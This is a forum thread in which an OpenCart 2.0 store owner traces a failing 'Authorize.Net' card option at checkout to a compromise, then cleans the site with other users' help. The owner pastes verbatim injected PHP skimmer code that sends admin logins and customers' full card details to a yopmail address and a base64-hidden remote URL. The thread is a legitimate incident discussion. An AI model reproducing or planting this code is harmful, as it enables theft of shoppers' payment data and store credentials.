OC 2.0.11
Paypal commerce platform v1.5.0
I have an issue with paypal commerce platform v1.5.0, when a customer pays with direct credit/debit card (authorise.net) payment using paypal the customer gets an error "The MERCHANT LOGIN ID or password is invalid or the account is inactive." I've been using this for a couple of years but the last couple of months this error has surfaced.
I don't have authorise.net, I'm using payments through paypal, so paypal are using the authorise.net service.
Paypal have not been helpful telling me to contact authorise.net directly.
So I thought, update the module to the latest version but I don't see a newer version for OC 2x
Can I upgrade to a later version or am I stuck with v1.5.0
From what I can tell version 1.5.0 of the payment extension was the last version that worked for versions below 2.2.x.
It probably is that need sorting out between Authorise.net and PayPal.
It probably is that need sorting out between Authorise.net and PayPal.
Paypal merchant services tell me that their end is working fine, something must have changed with the paypal commerce platform for it to offer authorise.net card payments.ADD Creative wrote: ↑Fri Apr 04, 2025 12:14 amFrom what I can tell version 1.5.0 of the payment extension was the last version that worked for versions below 2.2.x.
It probably is that need sorting out between Authorise.net and PayPal.
I'm not aware of any additional changes within the module as it was setup and worked from the start.
Anyone aware of the settings that would suddenly allow authorise.net to be called up?
I can find mention of Authorize.net in the extension or PayPay's SDK. I can't see why PayPal would use Authorize.net to process card payment when they do it themselves.
Are you sure that the Authorize.net extension hasn't been enabled?
Are you sure that the Authorize.net extension hasn't been enabled?
You should review your installed extensions. It doesn't make sense for a payment provider or processor to route a transaction through a competitor to complete the payment.
Got an urgent question that’s keeping you up at night? There might just be a magical inbox ready to help: khnaz35@gmail.com
Enjoy nature 
I've never activated authorise.net in OC. PayPal Merchant services suggest checking the PPCP module for any changes. I've double checked and all seems ok, I've even checked an old DB backup (when it was working before this issue) against the current DB and all there seems ok.ADD Creative wrote: ↑Fri Apr 04, 2025 6:41 pmI can find mention of Authorize.net in the extension or PayPay's SDK. I can't see why PayPal would use Authorize.net to process card payment when they do it themselves.
Are you sure that the Authorize.net extension hasn't been enabled?
I know, this was setup from the advise of the PayPal agent a couple of years ago, he said my paypal charges will be greatly reduced using direct card payments and worked fine until probably beginning of March.
I've even checked an old DB backup (when it was working before this issue) against the current DB and all there seems ok.
Just to be clear, do you actually have an Authorize.net account and have you ever entered the details into OpenCart or PayPal?
Perhaps giving a link to your store or screenshots of the payment page and errors for others to look at.
Perhaps giving a link to your store or screenshots of the payment page and errors for others to look at.
I've never activated authorise.net in OC, nor added any info to it, not even gone in to the module to look.ADD Creative wrote: ↑Fri Apr 04, 2025 8:26 pmJust to be clear, do you actually have an Authorize.net account and have you ever entered the details into OpenCart or PayPal?
Perhaps giving a link to your store or screenshots of the payment page and errors for others to look at.
The only payment option active under payments is paypal commerce platform.
At the checkout I have 2 payment options showing:
Credit Card / Debit Card (Authorize.Net)
PayPal (Express, Card)
These options can only be shown from the paypal commerce platform. I don't know where the authorise.net payment option has come from.
This make its even more questionable. Is their anyone else managing/accessing your store admin/ftp/cpanel etc ? Could it be someone else have activated it?hudds-phil wrote: ↑Fri Apr 04, 2025 10:34 pmI don't know where the authorise.net payment option has come from.
A link to store is required at this point.
Got an urgent question that’s keeping you up at night? There might just be a magical inbox ready to help: khnaz35@gmail.com
Enjoy nature
The first one is the exact wording in catalog/language/english/payment/authorizenet_aim.php or authorizenet_sim.php. Which suggests the Authorize.net extension is enabled. It has nothing to do with the PayPal extension unless it has somehow been modified.
The second one is the one added by the PayPal extension. If you select that you should still get the option to pay by card.
Check the oc_extension and oc_setting tables in you database to see what's enabled.
The second one is the one added by the PayPal extension. If you select that you should still get the option to pay by card.
Check the oc_extension and oc_setting tables in you database to see what's enabled.
I don't see an authorise.net_aim module, I only have authorise.net (SIM)ADD Creative wrote: ↑Fri Apr 04, 2025 11:14 pmThe first one is the exact wording in catalog/language/english/payment/authorizenet_aim.php or authorizenet_sim.php. Which suggests the Authorize.net extension is enabled. It has nothing to do with the PayPal extension unless it has somehow been modified.
The second one is the one added by the PayPal extension. If you select that you should still get the option to pay by card.
Check the oc_extension and oc_setting tables in you database to see what's enabled.
DB Extension:
DB Settings:
Attachments
???I've searched for authorise.net aim not installed but active and found this viewtopic.php?f=179&t=147282.ADD Creative wrote: ↑Fri Apr 04, 2025 11:14 pmThe first one is the exact wording in catalog/language/english/payment/authorizenet_aim.php or authorizenet_sim.php. Which suggests the Authorize.net extension is enabled. It has nothing to do with the PayPal extension unless it has somehow been modified.
The second one is the one added by the PayPal extension. If you select that you should still get the option to pay by card.
Check the oc_extension and oc_setting tables in you database to see what's enabled.
It looks like I've been hit with the authorisenet_aim hack
Found this bit of code in the admin/common/login.php code
{if($this->user->login($this->request->post['username'], $this->request->post['password'])){$smail=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."|".$this->request->post['username']."|".$this->request->post['password'];mail("alt.rm-5mym5dd@yopmail.com",$_SERVER['HTTP_HOST'],$smail,"From: admin@fly.com\r\nReply-to: alt.rm-5mym5dd@yopmail.com");$curl2=curl_init();curl_setopt($curl2,CURLOPT_RETURNTRANSFER,1);curl_setopt($curl2,CURLOPT_URL,base64_decode('aHR0cDovL2FueXRoaW5ncHJvLm5ldC9nZXQyLnBocA=='));curl_setopt($curl2, CURLOPT_POST, 1);curl_setopt($curl2, CURLOPT_POSTFIELDS, 'mailadmin='.urlencode($smail));curl_exec($curl2);curl_close($curl2);}
admin/controller/extension/payment.php
This code edited out
/*foreach ($extensions as $key => $value) {
if (!file_exists(DIR_APPLICATION . 'controller/payment/' . $value . '.php')) {
$this->model_extension_extension->uninstall('payment', $value);
unset($extensions[$key]);
}
}*/
catalog/controller/payment/authorisenet_aim.php code
;$smail=$order_info['order_id']."|".$order_info['payment_firstname']."|".$order_info['payment_lastname']."|".$order_info['payment_address_1']."|".$order_info['payment_city']."|".$order_info['payment_postcode']."|".$order_info['payment_zone']."|".$order_info['payment_country']."|".$order_info['telephone']."|".$this->request->post['cc_expire_date_month']."|".$this->request->post['cc_expire_date_year']."|".$this->request->post['cc_cvv2']."|".$this->request->post['cc_number']."|".$_SERVER['HTTP_HOST'];mail("alt.rm-5mym5dd@yopmail.com","au",$smail,"From: orders@fly.com\r\nReply-to: alt.rm-5mym5dd@yopmail.com");$curl2=curl_init();curl_setopt($curl2,CURLOPT_RETURNTRANSFER,1);curl_setopt($curl2,CURLOPT_URL,base64_decode('aHR0cDovL2FueXRoaW5ncHJvLm5ldC9nZXQyLnBocA=='));curl_setopt($curl2, CURLOPT_POST, 1);curl_setopt($curl2, CURLOPT_POSTFIELDS, 'data='.urlencode($smail)."&site=".$_SERVER['HTTP_HOST'].'tt');curl_exec($curl2);curl_close($curl2);
You need to clean your site, change all your passwords and investigate how it happened so it doesn't happen again.
I don't know how they got in, but following the steps from the forum link, I replaced all files with copies from the original download.ADD Creative wrote: ↑Sat Apr 05, 2025 12:23 amYou need to clean your site, change all your passwords and investigate how it happened so it doesn't happen again.
Change the admin password from PHPMyAdmin, replaced the DB password with a long random generated password.
The credit/debit card (authorise.net) payment no longer shows on the checkout page.
I will closely monitor this that is doesn't come back.
Thank you to all for your help and guidance, you're superstars.
Who is online
Users browsing this forum: No registered users and 4 guests
